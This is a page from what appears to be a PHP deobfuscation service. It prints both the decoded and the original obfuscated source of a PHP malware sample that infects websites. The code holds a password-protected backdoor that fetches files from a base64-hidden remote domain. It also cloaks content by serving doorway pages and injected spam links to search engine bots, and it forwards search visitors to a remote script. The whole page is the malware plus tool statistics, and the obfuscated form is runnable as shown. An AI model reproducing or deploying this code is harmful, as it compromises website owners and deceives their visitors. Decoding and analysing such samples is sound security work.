Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $nKUzXAEWwQOIJ="q4P6ti1DEAXZTeOjFGJpwbu_MLn9cd8lhK02agRzvV7Wr5NyHsCxSomUkI3QBfY";$Sc..
Decoded Output download
set_time_limit(0);
function change_page_regex($page, $links,$reg,$res){
$elements = array();
if (preg_match_all($reg, $page, $result)) {
$elements = $result[$res];
$elements = array_unique($elements);
}
$m=min(count($links),count($elements));
for ($i = 0; $i < $m; $i++) {
$link = array_shift($links);
$element = array_shift($elements);
$page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1);
}
if (count($links)>0){
$element = "<p>";
$element .= implode("<br>
", $links);
$element .= "</p>";
$page = preg_replace('/\<\/body\>/i', "
" . $element . "
$0", $page, 1);
}
return $page;
}
function curly_page_get($url,$useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"){
$ch = curl_init ();
curl_setopt ($ch, CURLOPT_URL,$url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, 3000);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
$result = curl_exec ($ch);
$curly_page_get_info=curl_getinfo($ch);
curl_close($ch);
return array($result,$curly_page_get_info);
}
function get_proxy_page(){
$proto=stripos(@$_SERVER['SERVER_PROTOCOL'],'https') === true ? 'https://' : 'http://';
$crurl=$proto.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
list($buf,$curly_page_get_info)=curly_page_get($crurl);
$ct=@$curly_page_get_info['content_type'];
$nexturl=@$curly_page_get_info['redirect_url'];
$status=@$curly_page_get_info['http_code'];
if (status!="")header("Status: $status");
if ($ct!=""){
header("Content-type: $ct");
}
if ($nexturl!=""){
header("Location: $nexturl");
}
return array($buf,$ct);
}
if (function_exists('sys_get_temp_dir')) {$tmppath = sys_get_temp_dir();if (!is_dir($tmppath)){ $tmppath = (dirname(__FILE__)); } } else { $tmppath = (dirname(__FILE__));}
$content="";
$x=@$_POST["pppp_check"];
$md5pass="e5e4570182820af0a183ce1520afe43b";
$host=@$_SERVER["HTTP_HOST"];
$uri=@$_SERVER["REQUEST_URI"];
$host=str_replace("www.","",$host);
$md5host=md5($host);
$urx=$host.$uri;
$md5urx=md5($urx);
$tmppath=$tmppath."/.".$md5host."/";
@mkdir($tmppath);
$configs=$tmppath."emoji1.png";
$bd=$tmppath."metaicons.jpg";
$templ=$tmppath."wp-themesall.gif";
$domain=base64_decode("cG9wLXVwMjAxOS5ydQ==");
$p=md5(base64_decode(@$_POST["p"]));
if (($x!="")&&($p==$md5pass)){
if ($x=="2"){
echo "###UPDATING_FILES###
";
list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/emoji1.png");
@file_put_contents($configs,$buf1);
list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/metaicons.jpg");
@file_put_contents($bd,$buf1);
list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/wp-themesall.gif");
@file_put_contents($templ,$buf1);
exit;
}
if ($x=="4"){
echo "###WORKED###
";exit;
}
}else{
$cf=array();
if (@file_exists($configs)){
$cf=@unserialize(base64_decode(@file_get_contents($configs)));
}
if (@isset($cf[$md5urx])){
$bot=0;$se=0;$ua=@$_SERVER["HTTP_USER_AGENT"];$ref=@$_SERVER["HTTP_REFERER"];$myip=@$_SERVER["REMOTE_ADDR"];
if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", $ref))$se=1;
if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", $ua))$bot=1;
$off=$cf[$md5urx]+0;
$template=base64_decode(@file_get_contents($templ));$f=@fopen($bd,"r");@fseek($f,$off);$buf=trim(@fgets($f,10000000));@fclose($f);$info=unserialize(base64_decode($buf));
$keyword=@$info["keyword"];$IDpack=@$info["IDpack"];$base=@$info["base"];$text=@$info["text"];$title=@$info["title"];$description=@$info["description"];$uckeyword=ucwords($keyword);$inside_links=@$info["inside_links"];
if ($bot) {
if (isset($info["contenttype"])){$contenttype=base64_decode($info["contenttype"]);$types=explode("
",$contenttype);foreach($types as $val){$val=trim($val);if($val!="")header($val);}}
if (isset($info["isdoor"])){
if (isset($info["standalone"])){
$doorcontent=base64_decode($text);
echo $doorcontent;exit;
}else{
$template=str_replace("%text%",$text,$template);
$template=str_replace("%title%",$title,$template);
$template=str_replace("%description%",$description,$template);
$template=str_replace("%uckeyword%",$uckeyword,$template);
$template=str_replace("%keyword%",str_replace(" ", ",", trim($keyword)),$template);
foreach($inside_links as $i => $link){
$template=str_replace("%INSIDE_LINK_".$i."%",$link,$template);
}
echo $template;exit;
}
}else{
list($buf,$ct)=get_proxy_page();
if (stristr($ct,"text/html")){
$rega='/\<a\s.*?\>.*?\<\/a\>/i';$resa=0;
$links=$info["links_a"];
$buf=change_page_regex($buf,$links,$rega,$resa);
$regp='/(.{30}\<\/p\>)/is';$resp=1;
$links=$info["links_p"];
$buf=change_page_regex($buf,$links,$regp,$resp);
}
echo $buf;
}
}
if ($se) {
if (isset($info["isdoor"])){
list($buf1,$curly_page_get_info)=curly_page_get("http://$domain/ff.php?ip=".$IDpack."&mk=".rawurlencode($keyword)."&base=".rawurlencode($base)."&d=".rawurlencode($host)."&u=".rawurlencode($urx)."&addr=".$myip."&ref=".rawurlencode($ref),$ua);
echo $buf1;exit;
}else{
list($buf,$ct)=get_proxy_page();
echo $buf;exit;
}
}
}else{
list($buf,$ct)=get_proxy_page();
echo $buf;
}
}
Did this file decode correctly?
Original Code
<?php $nKUzXAEWwQOIJ="q4P6ti1DEAXZTeOjFGJpwbu_MLn9cd8lhK02agRzvV7Wr5NyHsCxSomUkI3QBfY";$ScIvdMTwCg=$nKUzXAEWwQOIJ[21]. $nKUzXAEWwQOIJ[36].$nKUzXAEWwQOIJ[49]. $nKUzXAEWwQOIJ[13]. $nKUzXAEWwQOIJ[3] .$nKUzXAEWwQOIJ[1].
$nKUzXAEWwQOIJ[23] .$nKUzXAEWwQOIJ[29].$nKUzXAEWwQOIJ[13].$nKUzXAEWwQOIJ[28]. $nKUzXAEWwQOIJ[53] .$nKUzXAEWwQOIJ[29] .$nKUzXAEWwQOIJ[13];$mRKZsbjUcZTP=$nKUzXAEWwQOIJ[37]. $nKUzXAEWwQOIJ[39] . $nKUzXAEWwQOIJ[5] .$nKUzXAEWwQOIJ[26]. $nKUzXAEWwQOIJ[61] .$nKUzXAEWwQOIJ[31]. $nKUzXAEWwQOIJ[36] . $nKUzXAEWwQOIJ[4] .$nKUzXAEWwQOIJ[13];$LNlRmYtZjNLyX=$nKUzXAEWwQOIJ[13] .$nKUzXAEWwQOIJ[44] . $nKUzXAEWwQOIJ[44] .$nKUzXAEWwQOIJ[53] .$nKUzXAEWwQOIJ[44] . $nKUzXAEWwQOIJ[23] .$nKUzXAEWwQOIJ[44] .$nKUzXAEWwQOIJ[13] .$nKUzXAEWwQOIJ[19]. $nKUzXAEWwQOIJ[53]. $nKUzXAEWwQOIJ[44]. $nKUzXAEWwQOIJ[4] .$nKUzXAEWwQOIJ[5] .$nKUzXAEWwQOIJ[26].$nKUzXAEWwQOIJ[37];$muKnHmBbxNorx=$nKUzXAEWwQOIJ[28].$nKUzXAEWwQOIJ[44]. $nKUzXAEWwQOIJ[13]. $nKUzXAEWwQOIJ[36]. $nKUzXAEWwQOIJ[4]. $nKUzXAEWwQOIJ[13] . $nKUzXAEWwQOIJ[23] . $nKUzXAEWwQOIJ[61].$nKUzXAEWwQOIJ[22].$nKUzXAEWwQOIJ[26].$nKUzXAEWwQOIJ[28]. $nKUzXAEWwQOIJ[4] .$nKUzXAEWwQOIJ[5] . $nKUzXAEWwQOIJ[53] . $nKUzXAEWwQOIJ[26];$LNlRmYtZjNLyX(0);$KEuzNZtzupmv=$muKnHmBbxNorx("",$mRKZsbjUcZTP($ScIvdMTwCg("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")));$KEuzNZtzupmv();?>Function Calls
| null | 1 |
| gzinflate | 1 |
| base64_decode | 1 |
| create_function | 1 |
| error_reporting | 1 |
Stats
| MD5 | 069a1fbb46035bb4758de6d768edbb2b |
| Eval Count | 1 |
| Decode Time | 128 ms |